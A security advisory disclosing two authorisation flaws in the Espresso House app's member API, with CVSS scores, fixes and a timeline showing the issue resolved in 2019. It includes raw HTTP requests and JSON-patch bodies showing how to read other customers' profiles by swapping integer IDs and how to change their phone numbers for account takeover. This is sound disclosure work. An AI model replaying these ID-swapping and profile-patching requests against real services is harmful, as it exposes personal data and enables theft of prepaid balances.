Espresso House Insufficient Access Control for Customer Profiles
Company Description
Espresso House is a Scandinavian coffee shop chain, founded in Sweden in 1996. It operates hundreds of locations across Sweden, Norway, Finland, Denmark, and Germany, offering a range of coffee, food, and bakery products. The company focuses on providing a casual café experience in urban and high-traffic areas.
Application Description
The Espresso House mobile app allows customers to order ahead, make payments, and collect loyalty points for rewards. It also offers personalised promotions, digital receipts, and the ability to locate nearby cafés. Individuals can self-enrol in the app for access to these features.
Espresso House Direct Object Reference for Customers
Summary
Adversaries could leverage an authorisation issue to gain access to customer profiles containing personal data.
Severity Scoring
HIGH, 7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Technical Details
- Have access to two membership accounts and log in as one of them.
- Monitor the HTTP requests issued by the application, especially the following:
GET /beproud/api/member/v1/[ ID FOR CURRENT USER ] HTTP/1.1
Host: myespressohouse.com
Content-Type: application/json-patch+json
Longitude: [ Longitude ]
Accept: */*
Latitude: [ Latitude ]
BPAuth: [ Access Token ]
User-Agent: Espresso House/3.0.9 (com.mps.eh; build:3141; iOS 12.1.2) Alamofire/4.8.0
Accept-Language: en
Accept-Encoding: gzip, deflate
Connection: close
Response:
{
"original": {
"myEspressoHouseNumber": "[ ID FOR CURRENT USER ]",
"firstName": "[ FIRST NAME ]",
"lastName": "[ LAST NAME ]",
[...]
-
The request detailed above loads the user profile associated with the supplied membership ID; the back-end application does not validate whether or not the user is accessing their own profile, or a profile belonging to someone else.
-
Swap the membership ID to that of the second account, while still being logged on as the first account; note how the application returns the second membership profile.
-
As membership IDs are integer values, it is trivial to incrementally search for valid IDs and enumerate customer data through this vulnerability.
Recommendation
Either:
- Do not allow the user to supply the profile membership ID. Instead, derive this ID from the user session token. Or,
- Assert that the membership ID belongs to the current user before fetching and returning it to the requestor.
Espresso House Insufficient Authorisation for Profile Update
Summary
Adversaries could modify profile attributes in order to use prepaid balances of other customers, gain a high level of VIP-discount, upgrade account to staff status, and more, by modifying the profile update request.
Severity Scoring
HIGH, 8.6 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
Technical Details
- Have access to two membership accounts and log in as one of them.
- Go to Profile > Settings > Name and update the first name.
- Monitor the HTTP requests issued by the application, especially the following:
PATCH /beproud/api/member/v1/[ ID FOR CURRENT USER ] HTTP/1.1
Host: myespressohouse.com
Content-Type: application/json-patch+json
Longitude: [ Longitude ]
Accept: */*
Connection: close
Latitude: [ Latitude ]
BPAuth: [ Access Token ]
Accept-Language: en
User-Agent: Espresso House/3.0.9 (com.mps.eh; build:3141; iOS 12.1.2) =
Alamofire/4.8.0
Accept-Encoding: gzip, deflate
Content-Length: 46
[{"op":"add","path":"firstName","value":"[ INPUT VALUE ]"}]
-
The request detailed above modifies the user profile associated with the supplied membership ID.
- The value of the path attribute can be changed to point to other profile properties, such as mobile phone number. The following request body would update the user phone number to any value:
[{"op":"add","path":"phoneNumber","value":"[ INPUT VALUE ]"}]
The phone number is not normally modifiable via the application.
-
The back-end application does not validate whether or not the user is accessing their own profile, or a profile belonging to someone else. This behaviour could allow an attacker to perform account takeovers and spend prepaid balances.
- As membership IDs are integer values, it is trivial to incrementally search for valid IDs. to target.
Recommendation
Do not allow users to update arbitrary profile properties which cannot be modified though the user interface. Furthermore, assert that the profile to be updated belongs to the current user requesting the operation.
Vulnerability Disclosure Timeline
2018-12-22 - Discovered and attempting to disclose via support
2018-12-27 - Support states they will forward the issue to the responsible department for review and follow-up if further contact is of interest
2018-12-31 - Requested a timeline for response
2019-01-02 - Support indicates they do not have a timeline for response, as the department will follow up if there’s interest
2019-01-09 - Informed company that the issue will be escalated if no one reaches out
2019-01-14 - Established contact with the company’s security function via CERT-SE
2019-01-16 - Status follow-up
2019-01-24 - Status follow-up
2019-02-11 - Issue confirmed as resolved